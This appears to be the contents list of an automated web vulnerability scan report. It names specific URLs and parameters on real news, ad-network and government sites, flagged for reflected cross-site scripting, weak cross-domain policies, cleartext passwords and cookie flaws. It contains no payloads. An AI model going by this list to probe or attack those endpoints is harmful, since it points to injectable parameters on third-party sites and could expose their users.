1.1. http://ad.doubleclick.net/ad/N4873.npr.og/B5461009 [REST URL parameter 1]
1.2. http://ad.doubleclick.net/adi/N4300.Google/B5350353.10 [REST URL parameter 1]
1.3. http://ad.doubleclick.net/adj/N2883.6441.USATODAY.COM/B5327539.11 [REST URL parameter 1]
1.4. http://ad.doubleclick.net/adj/cm.rub_usatoday/ [REST URL parameter 1]
1.5. http://ad.doubleclick.net/adj/ipc-csm/globalisation_US [REST URL parameter 1]
1.6. http://ad.doubleclick.net/adj/n6735.NPR/utility_search [REST URL parameter 1]
1.7. http://ad.doubleclick.net/dot.gif [REST URL parameter 1]
1.9. http://ad.doubleclick.net/pfadx/csmonitor_cim/ [secure parameter]
1.10. http://bidder.mathtag.com/iframe/notify [exch parameter]
1.11. http://d7.zedo.com/bar/v16-406/d3/jsc/fmr.js [$ parameter]
1.12. http://tacoda.at.atwola.com/rtx/r.js [N cookie]
1.13. http://tacoda.at.atwola.com/rtx/r.js [si parameter]
1.14. http://tracker.bidder7.mookie1.com/tr-goog [u parameter]
2. Cross-site scripting (reflected)
2.1. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php [cid parameter]
2.2. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php [id parameter]
2.4. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php [rv parameter]
2.5. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php [t parameter]
2.6. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php [uid parameter]
2.7. http://480-adver-view.c3metrics.com/v.js [cid parameter]
2.8. http://480-adver-view.c3metrics.com/v.js [id parameter]
2.9. http://480-adver-view.c3metrics.com/v.js [t parameter]
2.10. http://a.collective-media.net/adj/cm.rub_usatoday/ [REST URL parameter 2]
2.12. http://a.collective-media.net/adj/cm.rub_usatoday/ [sz parameter]
2.13. http://ad.doubleclick.net/adi/N4300.Google/B5350353.10 [adurl parameter]
2.14. http://ad.doubleclick.net/adi/N4300.Google/B5350353.10 [ai parameter]
2.15. http://ad.doubleclick.net/adi/N4300.Google/B5350353.10 [client parameter]
2.16. http://ad.doubleclick.net/adi/N4300.Google/B5350353.10 [num parameter]
2.17. http://ad.doubleclick.net/adi/N4300.Google/B5350353.10 [sig parameter]
2.18. http://ad.doubleclick.net/adi/N4300.Google/B5350353.10 [sz parameter]
2.19. http://ad.doubleclick.net/adi/N4492.134426.1009314592321/B4140786.136 [adurl parameter]
2.20. http://ad.doubleclick.net/adi/N4492.134426.1009314592321/B4140786.136 [ai parameter]
2.21. http://ad.doubleclick.net/adi/N4492.134426.1009314592321/B4140786.136 [client parameter]
2.22. http://ad.doubleclick.net/adi/N4492.134426.1009314592321/B4140786.136 [num parameter]
2.23. http://ad.doubleclick.net/adi/N4492.134426.1009314592321/B4140786.136 [sig parameter]
2.24. http://ad.doubleclick.net/adi/N4492.134426.1009314592321/B4140786.136 [sz parameter]
2.25. http://ad.doubleclick.net/adi/N5895.133090.0460774079521/B4563625.8 [mt_adid parameter]
2.26. http://ad.doubleclick.net/adi/N5895.133090.0460774079521/B4563625.8 [mt_id parameter]
2.27. http://ad.doubleclick.net/adi/N5895.133090.0460774079521/B4563625.8 [mt_uuid parameter]
2.29. http://ad.doubleclick.net/adi/N5895.133090.0460774079521/B4563625.8 [redirect parameter]
2.30. http://ad.doubleclick.net/adi/N5895.133090.0460774079521/B4563625.8 [sz parameter]
2.31. http://ad.doubleclick.net/adj/N2883.6441.USATODAY.COM/B5327539.11 [sz parameter]
2.32. http://ads.bridgetrack.com/a/f/ [click parameter]
2.33. http://ads.bridgetrack.com/a/f/ [click parameter]
2.34. http://ads.bridgetrack.com/a/f/ [name of an arbitrarily supplied request parameter]
2.35. http://ads.pointroll.com/PortalServe/ [r parameter]
2.36. http://ads.pointroll.com/PortalServe/ [redir parameter]
2.37. http://ads.pointroll.com/PortalServe/ [time parameter]
2.38. http://api-public.addthis.com/url/shares.json [callback parameter]
2.39. http://ar.voicefive.com/b/rc.pli [func parameter]
2.40. http://b.scorecardresearch.com/beacon.js [c1 parameter]
2.41. http://b.scorecardresearch.com/beacon.js [c15 parameter]
2.42. http://b.scorecardresearch.com/beacon.js [c2 parameter]
2.43. http://b.scorecardresearch.com/beacon.js [c3 parameter]
2.44. http://b.scorecardresearch.com/beacon.js [c4 parameter]
2.45. http://b.scorecardresearch.com/beacon.js [c5 parameter]
2.46. http://b.scorecardresearch.com/beacon.js [c6 parameter]
2.53. http://choices.truste.com/ca [c parameter]
2.54. http://choices.truste.com/ca [h parameter]
2.55. http://choices.truste.com/ca [iplc parameter]
2.56. http://choices.truste.com/ca [ox parameter]
2.57. http://choices.truste.com/ca [plc parameter]
2.58. http://choices.truste.com/ca [w parameter]
2.59. http://choices.truste.com/ca [zi parameter]
2.60. http://content.usatoday.com/apps/insidepage/crc.ashx [callback parameter]
2.61. http://d7.zedo.com/bar/v16-406/d3/jsc/fm.js [$ parameter]
2.62. http://d7.zedo.com/bar/v16-406/d3/jsc/fm.js [$ parameter]
2.63. http://d7.zedo.com/bar/v16-406/d3/jsc/fm.js [q parameter]
2.64. http://d7.zedo.com/bar/v16-406/d3/jsc/fm.js [q parameter]
2.65. http://d7.zedo.com/bar/v16-406/d3/jsc/fmr.js [$ parameter]
2.66. http://d7.zedo.com/bar/v16-406/d3/jsc/fmr.js [$ parameter]
2.67. http://d7.zedo.com/bar/v16-406/d3/jsc/fmr.js [q parameter]
2.68. http://d7.zedo.com/bar/v16-406/d3/jsc/fmr.js [q parameter]
2.69. http://data.usatoday.net/apps/InsidePage [url parameter]
2.70. http://data.usatoday.net/apps/InsidePage [url parameter]
2.71. http://data.usatoday.net/apps/InsidePage [var parameter]
2.72. http://ds.addthis.com/red/psi/sites/www.fox8live.com/p.json [callback parameter]
2.73. http://event.adxpose.com/event.flow [uid parameter]
2.74. http://finance.fox8live.com/inergize.wvue [Module parameter]
2.75. http://finance.fox8live.com/inergize.wvue [REST URL parameter 1]
2.76. http://finance.fox8live.com/inergize.wvue [name of an arbitrarily supplied request parameter]
2.91. http://i.usatoday.net/asp/usatly/handler.ashx [longUrl parameter]
2.92. http://ib.adnxs.com/ab [cnd parameter]
2.93. http://ib.adnxs.com/ptj [redir parameter]
2.94. http://k.collective-media.net/cmadj/cm.rub_usatoday/ [REST URL parameter 2]
2.95. http://radar.weather.gov/Conus/images/favicon.ico [REST URL parameter 3]
2.96. http://radar.weather.gov/Conus/images/favicon.ico [REST URL parameter 3]
2.97. http://radar.weather.gov/Conus/index.php [REST URL parameter 1]
2.98. http://radar.weather.gov/Conus/index.php [REST URL parameter 1]
2.99. http://radar.weather.gov/Conus/index.php [REST URL parameter 1]
2.100. http://radar.weather.gov/Conus/index.php [REST URL parameter 2]
2.101. http://radar.weather.gov/images/favicon.ico [REST URL parameter 2]
2.102. http://radar.weather.gov/images/favicon.ico [REST URL parameter 2]
2.103. http://radar.weather.gov/radar.php [REST URL parameter 1]
2.104. http://radar.weather.gov/radar.php [product parameter]
2.105. http://sitelife.usatoday.com/ver1.0/sys/jsonp.app [cb parameter]
2.106. http://sitelife.usatoday.com/ver1.0/sys/jsonp.app [plckcommentonkey parameter]
2.107. http://sitelife.usatoday.com/ver1.0/sys/jsonp.app [plckcommentonkeytype parameter]
2.108. http://w10.localadbuy.com/servlet/ajrotator/2735/0/vj [REST URL parameter 1]
2.109. http://w10.localadbuy.com/servlet/ajrotator/2735/0/vj [REST URL parameter 2]
2.110. http://w10.localadbuy.com/servlet/ajrotator/541/0/vj [REST URL parameter 1]
2.111. http://w10.localadbuy.com/servlet/ajrotator/541/0/vj [REST URL parameter 2]
2.112. http://w10.localadbuy.com/servlet/ajrotator/543/0/vj [REST URL parameter 1]
2.113. http://w10.localadbuy.com/servlet/ajrotator/543/0/vj [REST URL parameter 2]
2.114. http://w10.localadbuy.com/servlet/ajrotator/546/0/vj [REST URL parameter 1]
2.115. http://w10.localadbuy.com/servlet/ajrotator/546/0/vj [REST URL parameter 2]
2.116. http://w10.localadbuy.com/servlet/ajrotator/550/0/vj [REST URL parameter 1]
2.117. http://w10.localadbuy.com/servlet/ajrotator/550/0/vj [REST URL parameter 2]
2.118. http://w10.localadbuy.com/servlet/ajrotator/551/0/vj [REST URL parameter 1]
2.119. http://w10.localadbuy.com/servlet/ajrotator/551/0/vj [REST URL parameter 2]
2.120. http://wvue.web.entriq.net/nw/dpm/loadplayer/ [REST URL parameter 1]
2.121. http://wvue.web.entriq.net/nw/dpm/loadplayer/ [playerID parameter]
2.122. http://www.collegesurfing.com/searchbox-mge-us.php [id parameter]
2.123. http://www.csmonitor.com/Business [REST URL parameter 1]
2.129. http://www.macroaxis.com/widgets/url.jsp [name of an arbitrarily supplied request parameter]
2.130. http://www.macroaxis.com/widgets/url.jsp [s parameter]
2.131. http://www.macroaxis.com/widgets/url.jsp [t parameter]
2.132. http://www.npr.org/templates/reg/forgot-password-submit.php [public_user_email parameter]
2.133. http://www.therepublic.com/assets/gzip.php [f0 parameter]
2.134. http://www.therepublic.com/assets/gzip.php [f0 parameter]
2.135. http://www.therepublic.com/assets/gzip.php [f1 parameter]
2.136. http://www.therepublic.com/assets/gzip.php [f1 parameter]
2.137. http://www.therepublic.com/assets/gzip.php [f2 parameter]
2.138. http://www.therepublic.com/assets/gzip.php [f2 parameter]
2.139. http://www.therepublic.com/assets/gzip.php [f3 parameter]
2.143. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php [C3UID cookie]
2.144. http://ar.voicefive.com/bmx3/broker.pli [BMX_3PC cookie]
2.145. http://ar.voicefive.com/bmx3/broker.pli [BMX_G cookie]
2.146. http://ar.voicefive.com/bmx3/broker.pli [UID cookie]
2.147. http://ar.voicefive.com/bmx3/broker.pli [ar_p81479006 cookie]
2.148. http://ar.voicefive.com/bmx3/broker.pli [ar_p82806590 cookie]
2.149. http://ar.voicefive.com/bmx3/broker.pli [ar_p84552060 cookie]
2.150. http://ar.voicefive.com/bmx3/broker.pli [ar_p90175839 cookie]
2.151. http://ar.voicefive.com/bmx3/broker.pli [ar_p90452457 cookie]
2.152. http://ar.voicefive.com/bmx3/broker.pli [ar_p91136705 cookie]
2.153. http://ar.voicefive.com/bmx3/broker.pli [ar_p91300630 cookie]
2.154. http://ar.voicefive.com/bmx3/broker.pli [ar_p92429851 cookie]
2.155. http://ar.voicefive.com/bmx3/broker.pli [ar_p97174789 cookie]
2.156. http://ar.voicefive.com/bmx3/broker.pli [ar_s_p81479006 cookie]
2.157. http://d7.zedo.com/bar/v16-406/d3/jsc/fm.js [ZEDOIDA cookie]
2.158. http://d7.zedo.com/bar/v16-406/d3/jsc/fmr.js [ZEDOIDA cookie]
2.159. http://ib.adnxs.com/acb [acb145072 cookie]
2.160. http://ib.adnxs.com/acb [acb893170 cookie]
2.161. http://k.collective-media.net/cmadj/cm.rub_usatoday/ [cli cookie]
2.162. http://optimized-by.rubiconproject.com/a/4462/5032/7108-2.html [ruid cookie]
3.1. http://a.collective-media.net/crossdomain.xml
3.2. http://a1.interclick.com/crossdomain.xml
3.3. http://action.mathtag.com/crossdomain.xml
3.4. http://ad.amgdgt.com/crossdomain.xml
3.5. http://ad.doubleclick.net/crossdomain.xml
3.6. http://ads.pointroll.com/crossdomain.xml
3.7. http://amch.questionmarket.com/crossdomain.xml
3.8. http://analytics.newsinc.com/crossdomain.xml
3.9. http://ar.voicefive.com/crossdomain.xml
3.10. http://assets1.grouponcdn.com/crossdomain.xml
3.11. http://at.amgdgt.com/crossdomain.xml
3.12. http://b.scorecardresearch.com/crossdomain.xml
3.13. http://b.voicefive.com/crossdomain.xml
3.14. http://b3.mookie1.com/crossdomain.xml
3.15. http://bh.contextweb.com/crossdomain.xml
3.16. http://bs.serving-sys.com/crossdomain.xml
3.17. http://cache-01.cleanprint.net/crossdomain.xml
3.18. http://cdn.gigya.com/crossdomain.xml
3.19. http://cdn.interclick.com/crossdomain.xml
3.20. http://cdn.taboolasyndication.com/crossdomain.xml
3.21. http://cr0.worthathousandwords.com/crossdomain.xml
3.22. http://d7.zedo.com/crossdomain.xml
3.23. http://ds.serving-sys.com/crossdomain.xml
3.24. http://event.adxpose.com/crossdomain.xml
3.25. http://finance.fox8live.com/crossdomain.xml
3.26. http://fls.doubleclick.net/crossdomain.xml
3.27. http://fw.adsafeprotected.com/crossdomain.xml
3.28. http://gannett.gcion.com/crossdomain.xml
3.29. http://gscounters.gigya.com/crossdomain.xml
3.30. http://ib.adnxs.com/crossdomain.xml
3.31. http://ic.nexac.com/crossdomain.xml
3.32. http://idcs.interclick.com/crossdomain.xml
3.33. http://k.collective-media.net/crossdomain.xml
3.34. http://log30.doubleverify.com/crossdomain.xml
3.35. http://map.media6degrees.com/crossdomain.xml
3.36. http://metrics.csmonitor.com/crossdomain.xml
3.37. http://metrics.npr.org/crossdomain.xml
3.38. http://mobile.fox8live.com/crossdomain.xml
3.39. http://pix04.revsci.net/crossdomain.xml
3.40. http://pixel.quantserve.com/crossdomain.xml
3.41. http://radar.weather.gov/crossdomain.xml
3.42. http://s.meebocdn.net/crossdomain.xml
3.43. http://s0.2mdn.net/crossdomain.xml
3.44. http://secure-us.imrworldwide.com/crossdomain.xml
3.45. http://segment-pixel.invitemedia.com/crossdomain.xml
3.46. http://spd.pointroll.com/crossdomain.xml
3.47. http://speed.pointroll.com/crossdomain.xml
3.48. http://stp.fox8live.com/crossdomain.xml
3.49. http://t.mookie1.com/crossdomain.xml
3.50. http://t.pointroll.com/crossdomain.xml
3.51. http://trc.taboolasyndication.com/crossdomain.xml
3.52. http://usatoday1.112.2o7.net/crossdomain.xml
3.53. http://va.px.invitemedia.com/crossdomain.xml
3.54. http://w10.localadbuy.com/crossdomain.xml
3.55. http://widget.newsinc.com/crossdomain.xml
3.56. http://wvue.web.entriq.net/crossdomain.xml
3.57. http://www.fox8live.com/crossdomain.xml
3.58. http://www.groupon.com/crossdomain.xml
3.59. https://www.groupon.com/crossdomain.xml
3.60. http://xedge.aperture.displaymarketplace.com/crossdomain.xml
3.61. http://adadvisor.net/crossdomain.xml
3.62. http://ads.bridgetrack.com/crossdomain.xml
3.63. http://content.usatoday.com/crossdomain.xml
3.64. http://contextweb.usatoday.net/crossdomain.xml
3.65. http://data.usatoday.net/crossdomain.xml
3.66. http://googleads.g.doubleclick.net/crossdomain.xml
3.67. http://i.usatoday.net/crossdomain.xml
3.68. http://optimized-by.rubiconproject.com/crossdomain.xml
3.69. http://pagead2.googlesyndication.com/crossdomain.xml
3.70. http://pubads.g.doubleclick.net/crossdomain.xml
3.71. http://rd.meebo.com/crossdomain.xml
3.72. http://share.meebo.com/crossdomain.xml
3.73. http://static.ak.fbcdn.net/crossdomain.xml
3.74. http://syndication.mmismm.com/crossdomain.xml
3.75. http://videos.usatoday.net/crossdomain.xml
3.76. http://www.collegesurfing.com/crossdomain.xml
3.77. http://www.facebook.com/crossdomain.xml
3.78. http://www.meebo.com/crossdomain.xml
3.79. http://www.npr.org/crossdomain.xml
3.80. http://www.usatoday.com/crossdomain.xml
3.81. http://api.twitter.com/crossdomain.xml
4. Silverlight cross-domain policy
4.1. http://ad.doubleclick.net/clientaccesspolicy.xml
4.2. http://ads.pointroll.com/clientaccesspolicy.xml
4.3. http://b.scorecardresearch.com/clientaccesspolicy.xml
4.4. http://b.voicefive.com/clientaccesspolicy.xml
4.5. http://content.usatoday.com/clientaccesspolicy.xml
4.6. http://contextweb.usatoday.net/clientaccesspolicy.xml
4.7. http://data.usatoday.net/clientaccesspolicy.xml
4.8. http://i.usatoday.net/clientaccesspolicy.xml
4.9. http://metrics.csmonitor.com/clientaccesspolicy.xml
4.10. http://metrics.npr.org/clientaccesspolicy.xml
4.11. http://s0.2mdn.net/clientaccesspolicy.xml
4.12. http://secure-us.imrworldwide.com/clientaccesspolicy.xml
4.13. http://spd.pointroll.com/clientaccesspolicy.xml
4.14. http://speed.pointroll.com/clientaccesspolicy.xml
4.15. http://usatoday1.112.2o7.net/clientaccesspolicy.xml
4.16. http://www.usatoday.com/clientaccesspolicy.xml
5. Cleartext submission of password
5.1. http://www.therepublic.com/login/
5.2. http://www.therepublic.com/login/register/
6. SSL cookie without secure flag set
6.1. https://shop.npr.org/index.php
6.2. https://www.groupon.com/dallas/
6.3. https://www.groupon.com/learn
6.4. https://www.groupon.com/login
6.5. https://www.groupon.com/mobile
6.6. https://www.groupon.com/users
6.7. https://www.groupon.com/users/new
7.1. http://login.npr.org/openid/embed
7.2. http://www.facebook.com/extern/login_status.php
7.3. http://www.npr.org/templates/reg/login.php
8. ASP.NET ViewState without MAC enabled
8.1. http://mobile.fox8live.com/BlackBerry/default.aspx
8.3. http://mobile.fox8live.com/default.aspx
8.6. http://mobile.fox8live.com/sports/default.aspx
8.8. http://mobile.fox8live.com/weather/default.aspx
8.9. http://www.fox8live.com/business/default.aspx
8.10. http://www.fox8live.com/business/iframe_financialticker.aspx
8.11. http://www.fox8live.com/business/iframe_indexwatch.aspx
8.12. http://www.fox8live.com/content/aboutus/default.aspx
8.13. http://www.fox8live.com/content/news/lee_zurik_investigation/default.aspx
8.14. http://www.fox8live.com/content/news/seregni/default.aspx
8.15. http://www.fox8live.com/content/news/watercooler/default.aspx
8.16. http://www.fox8live.com/default.aspx
8.17. http://www.fox8live.com/entertainment/horoscopes/default.aspx
8.20. http://www.fox8live.com/rss/default.aspx
8.21. http://www.fox8live.com/widgets/serve.aspx
8.22. http://www.fox8live.com/wireless/default.aspx
9.1. http://bh.contextweb.com/bh/rtset [rurl parameter]
9.3. http://trc.taboolasyndication.com/log/usatoday/debug [url parameter]
9.4. http://trc.taboolasyndication.com/usatoday/log/2/available [url parameter]
9.5. http://trc.taboolasyndication.com/usatoday/log/2/display [url parameter]
9.6. http://trc.taboolasyndication.com/usatoday/log/2/visible [url parameter]
9.7. https://www.groupon.com/users [Referer HTTP header]
10. Cookie scoped to parent domain
10.1. http://api.twitter.com/1/wvuefox8/lists/wvue-fox-8-3/statuses.json
10.2. http://t.mookie1.com/t/v1/imp
10.3. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php
10.4. http://a1.interclick.com/ColDta.aspx
10.5. http://ad.amgdgt.com/ads/
10.6. http://ad.doubleclick.net/clk
10.7. http://ads.pointroll.com/PortalServe/
10.8. http://ads.revsci.net/adserver/ako
10.9. http://ads.revsci.net/adserver/ako
10.10. http://amch.questionmarket.com/adsc/d887938/3/500004862365/decide.php
10.11. http://ar.voicefive.com/b/wc_beacon.pli
10.12. http://ar.voicefive.com/bmx3/broker.pli
10.13. http://at.amgdgt.com/ads/
10.14. http://b.scorecardresearch.com/b
10.15. http://b.scorecardresearch.com/p
10.16. http://b.voicefive.com/b
10.17. http://bh.contextweb.com/bh/rtset
10.18. http://bidder.mathtag.com/iframe/notify
10.19. http://bs.serving-sys.com/BurstingPipe/adServer.bs
10.20. http://d7.zedo.com/bar/v16-406/d3/jsc/fmr.js
10.21. http://ds.addthis.com/red/psi/sites/www.fox8live.com/p.json
10.23. http://ib.adnxs.com/acb
10.24. http://ib.adnxs.com/getuid
10.25. http://ib.adnxs.com/ptj
10.26. http://ib.adnxs.com/ptj
10.27. http://ib.adnxs.com/ptj
10.28. http://ib.adnxs.com/seg
10.29. http://idcs.interclick.com/Segment.aspx
10.30. http://image2.pubmatic.com/AdServer/Pug
10.31. http://leadback.advertising.com/adcedge/lb
10.32. http://map.media6degrees.com/orbserv/hbpix
10.33. http://odb.outbrain.com/utils/get
10.34. http://odb.outbrain.com/utils/get
10.35. http://odb.outbrain.com/utils/ping.html
10.36. http://optimized-by.rubiconproject.com/a/4462/5032/7108-2.html
10.37. http://pix04.revsci.net/D08734/a1/0/3/0.js
10.38. http://pix04.revsci.net/J06575/a4/0/0/pcx.js
10.39. http://pix04.revsci.net/J06575/b3/0/3/1003161/235941171.js
10.40. http://pix04.revsci.net/J06575/b3/0/3/1003161/498787488.js
10.41. http://pix04.revsci.net/J06575/b3/0/3/1003161/807655569.js
10.44. http://segment-pixel.invitemedia.com/pixel
10.45. http://segs.btrll.com/v1/tpix/-/-/-/-/-/sid.6544434
10.46. http://sitelife.usatoday.com/ver1.0/Stats/Tracker.gif
10.47. http://sitelife.usatoday.com/ver1.0/sys/jsonp.app
10.48. http://sitelife.usatoday.com/ver1.0/usat/pluck/comments/comments.js
10.49. http://sitelife.usatoday.com/ver1.0/usat/pluck/pluck.js
10.50. http://syndication.mmismm.com/tntwo.php
10.51. http://tacoda.at.atwola.com/rtx/r.js
10.52. http://tags.bluekai.com/site/3775
10.53. http://tags.bluekai.com/site/3869
10.54. http://trgc.opt.fimserve.com/fp.gif
10.55. http://trgca.opt.fimserve.com/fp.gif
10.56. http://va.px.invitemedia.com/adnxs_imp
10.57. http://www.groupon.com/dallas/
10.58. http://www.groupon.com/learn
10.59. http://www.groupon.com/mobile
10.60. http://www.groupon.com/privacy
10.61. http://www.groupon.com/subscriptions/new
10.62. https://www.groupon.com/dallas/
10.63. https://www.groupon.com/learn
10.64. https://www.groupon.com/login
10.65. https://www.groupon.com/mobile
10.66. https://www.groupon.com/users
10.67. https://www.groupon.com/users/new
10.68. http://www.tinbuadserv.com/v3/serve.php
11. Cookie without HttpOnly flag set
11.1. http://ads.adxpose.com/ads/ads.js
11.2. http://beacon-1.newrelic.com/1/fffa2293e6
11.3. http://event.adxpose.com/event.flow
11.4. http://fw.adsafeprotected.com/rjss/bs.serving-sys.com/9766/90645/BurstingPipe/adServer.bs
11.6. https://shop.npr.org/index.php
11.7. http://t.mookie1.com/t/v1/imp
11.8. http://trc.taboolasyndication.com/usatoday/trc/2/json
11.9. http://widgets.macroaxis.com/widgets/content.jsp
11.10. http://www.macroaxis.com/widgets/url.jsp
11.11. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php
11.12. http://a1.interclick.com/ColDta.aspx
11.13. http://a1.interclick.com/getInPageJSProcess.aspx
11.14. http://ad.amgdgt.com/ads/
11.15. http://ad.doubleclick.net/clk
11.16. http://ad.yieldmanager.com/pixel
11.17. http://ads.bridgetrack.com/a/f/
11.18. http://ads.pointroll.com/PortalServe/
11.19. http://ads.revsci.net/adserver/ako
11.20. http://ads.revsci.net/adserver/ako
11.21. http://amch.questionmarket.com/adsc/d887938/3/500004862365/decide.php
11.22. http://api.twitter.com/1/wvuefox8/lists/wvue-fox-8-3/statuses.json
11.23. http://ar.voicefive.com/b/wc_beacon.pli
11.24. http://ar.voicefive.com/bmx3/broker.pli
11.25. http://at.amgdgt.com/ads/
11.26. http://atd.agencytradingdesk.net/WatsonTracker/IMP/A1000138/C1000187/P1003017/pixel.gif
11.27. http://b.scorecardresearch.com/b
11.28. http://b.scorecardresearch.com/p
11.29. http://b.voicefive.com/b
11.30. http://bh.contextweb.com/bh/rtset
11.31. http://bidder.mathtag.com/iframe/notify
11.32. http://bs.serving-sys.com/BurstingPipe/adServer.bs
11.33. http://d7.zedo.com/bar/v16-406/d3/jsc/fmr.js
11.34. http://ds.addthis.com/red/psi/sites/www.fox8live.com/p.json
11.35. http://idcs.interclick.com/Segment.aspx
11.36. http://image2.pubmatic.com/AdServer/Pug
11.37. http://leadback.advertising.com/adcedge/lb
11.38. http://map.media6degrees.com/orbserv/hbpix
11.39. http://odb.outbrain.com/utils/get
11.40. http://odb.outbrain.com/utils/get
11.41. http://odb.outbrain.com/utils/ping.html
11.42. http://optimized-by.rubiconproject.com/a/4462/5032/7108-2.html
11.43. http://pix04.revsci.net/D08734/a1/0/3/0.js
11.44. http://pix04.revsci.net/J06575/a4/0/0/pcx.js
11.45. http://pix04.revsci.net/J06575/b3/0/3/1003161/235941171.js
11.46. http://pix04.revsci.net/J06575/b3/0/3/1003161/498787488.js
11.47. http://pix04.revsci.net/J06575/b3/0/3/1003161/807655569.js
11.50. http://segment-pixel.invitemedia.com/pixel
11.51. http://segs.btrll.com/v1/tpix/-/-/-/-/-/sid.6544434
11.52. http://sitelife.usatoday.com/ver1.0/Content/images/no-user-image.gif
11.59. http://sitelife.usatoday.com/ver1.0/Content/ua/images/comments/pluck-comm-action-buttons.png
11.60. http://sitelife.usatoday.com/ver1.0/Content/ua/images/comments/pluck-comm-background.png
11.63. http://sitelife.usatoday.com/ver1.0/Content/ua/images/comments/pluck-comm-rss-button.gif
11.64. http://sitelife.usatoday.com/ver1.0/Content/ua/images/pluck-avatar-blocked.gif
11.65. http://sitelife.usatoday.com/ver1.0/Content/ua/images/pluck-avatar-default.gif
11.66. http://sitelife.usatoday.com/ver1.0/Content/ua/images/pluck-pagination-bg-2.jpg
11.67. http://sitelife.usatoday.com/ver1.0/Content/ua/images/pluck-pagination-bg.jpg
11.68. http://sitelife.usatoday.com/ver1.0/Content/ua/images/pluck-pagination-last-bg.png
11.69. http://sitelife.usatoday.com/ver1.0/Content/ua/images/pluck-pagination-next-bg.png
11.70. http://sitelife.usatoday.com/ver1.0/Content/ua/images/pluck-primary-button-left.png
11.71. http://sitelife.usatoday.com/ver1.0/Content/ua/images/pluck-primary-button-right.png
11.75. http://sitelife.usatoday.com/ver1.0/Content/ua/images/throbber.gif
11.76. http://sitelife.usatoday.com/ver1.0/Content/ua/images/throbber_circle.gif
11.77. http://sitelife.usatoday.com/ver1.0/Content/ua/images/users/pluck-recommend-user-icon.gif
11.78. http://sitelife.usatoday.com/ver1.0/Content/ua/images/util/email/pluck-email-icon.gif
11.79. http://sitelife.usatoday.com/ver1.0/Content/ua/images/util/permalink/pluck-permalink-icon.gif
11.80. http://sitelife.usatoday.com/ver1.0/Content/ua/images/util/share/pluck-share-buzz.gif
11.81. http://sitelife.usatoday.com/ver1.0/Content/ua/images/util/share/pluck-share-delicious.gif
11.82. http://sitelife.usatoday.com/ver1.0/Content/ua/images/util/share/pluck-share-digg.gif
11.83. http://sitelife.usatoday.com/ver1.0/Content/ua/images/util/share/pluck-share-fb.gif
11.84. http://sitelife.usatoday.com/ver1.0/Content/ua/images/util/share/pluck-share-ff.gif
11.85. http://sitelife.usatoday.com/ver1.0/Content/ua/images/util/share/pluck-share-linkedin.gif
11.86. http://sitelife.usatoday.com/ver1.0/Content/ua/images/util/share/pluck-share-myspace.gif
11.87. http://sitelife.usatoday.com/ver1.0/Content/ua/images/util/share/pluck-share-reddit.gif
11.88. http://sitelife.usatoday.com/ver1.0/Content/ua/images/util/share/pluck-share-slashdot.gif
11.89. http://sitelife.usatoday.com/ver1.0/Content/ua/images/util/share/pluck-share-stumble.gif
11.90. http://sitelife.usatoday.com/ver1.0/Content/ua/images/util/share/pluck-share-tumblr.gif
11.91. http://sitelife.usatoday.com/ver1.0/Content/ua/images/util/share/pluck-share-tweet.gif
11.92. http://sitelife.usatoday.com/ver1.0/Content/ua/scripts/flXHR/checkplayer.js
11.93. http://sitelife.usatoday.com/ver1.0/Content/ua/scripts/flXHR/flXHR.js
11.94. http://sitelife.usatoday.com/ver1.0/Content/ua/scripts/flXHR/flensed.js
11.95. http://sitelife.usatoday.com/ver1.0/Content/ua/scripts/flXHR/jquery.flXHRproxy.js
11.96. http://sitelife.usatoday.com/ver1.0/Content/ua/scripts/flXHR/jquery.xhr.js
11.97. http://sitelife.usatoday.com/ver1.0/Content/ua/scripts/flXHR/swfobject.js
11.98. http://sitelife.usatoday.com/ver1.0/Stats/Tracker.gif
11.99. http://sitelife.usatoday.com/ver1.0/content/ua/css/pluckAll.css
11.100. http://sitelife.usatoday.com/ver1.0/sys/jsonp.app
11.101. http://sitelife.usatoday.com/ver1.0/usat/pluck/comments/comments.js
11.102. http://sitelife.usatoday.com/ver1.0/usat/pluck/pluck.js
11.103. http://syndication.mmismm.com/tntwo.php
11.104. http://tacoda.at.atwola.com/rtx/r.js
11.105. http://tags.bluekai.com/site/3775
11.106. http://tags.bluekai.com/site/3869
11.107. http://trc.taboolasyndication.com/usatoday/log/2/visible
11.108. http://trgc.opt.fimserve.com/fp.gif
11.109. http://trgca.opt.fimserve.com/fp.gif
11.110. http://va.px.invitemedia.com/adnxs_imp
11.111. http://www.groupon.com/dallas/
11.112. http://www.groupon.com/learn
11.113. http://www.groupon.com/mobile
11.114. http://www.groupon.com/privacy
11.115. http://www.groupon.com/subscriptions/new
11.116. https://www.groupon.com/dallas/
11.117. https://www.groupon.com/learn
11.118. https://www.groupon.com/login
11.119. https://www.groupon.com/mobile
11.120. https://www.groupon.com/users
11.121. https://www.groupon.com/users/new
11.122. http://www.hnedata.net/features/tr_stock_charts
11.123. http://www.tinbuadserv.com/v3/serve.php
12. Password field with autocomplete enabled
12.1. http://shop.npr.org/index.php
12.2. https://www.groupon.com/login
12.3. https://www.groupon.com/users/new
12.4. http://www.npr.org/templates/reg/
12.5. http://www.npr.org/templates/reg/login.php
12.6. http://www.therepublic.com/login/
12.7. http://www.therepublic.com/login/register/
13.1. http://assets1.grouponcdn.com/assets/application.js
13.2. http://assets1.grouponcdn.com/assets/subscriptions.js
15. Referer-dependent response
15.1. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php
15.2. http://480-adver-view.c3metrics.com/v.js
15.3. http://api.twitter.com/1/wvuefox8/lists/wvue-fox-8-3/statuses.json
15.4. http://fw.adsafeprotected.com/rjss/bs.serving-sys.com/9766/90645/BurstingPipe/adServer.bs
15.5. http://jqueryui.com/ui/jquery.ui.widget.js
15.6. http://www.facebook.com/plugins/like.php
15.7. http://www.facebook.com/plugins/recommendations.php
15.9. https://www.groupon.com/users
16.1. http://radar.weather.gov/Conus/index.php
16.2. http://radar.weather.gov/radar.php
16.3. http://www.csmonitor.com/Business
16.4. http://www.csmonitor.com/Business/2011/0509/Gas-prices-start-to-head-down
17. Cross-domain Referer leakage
17.1. http://ad.amgdgt.com/ads/
17.2. http://ad.amgdgt.com/ads/
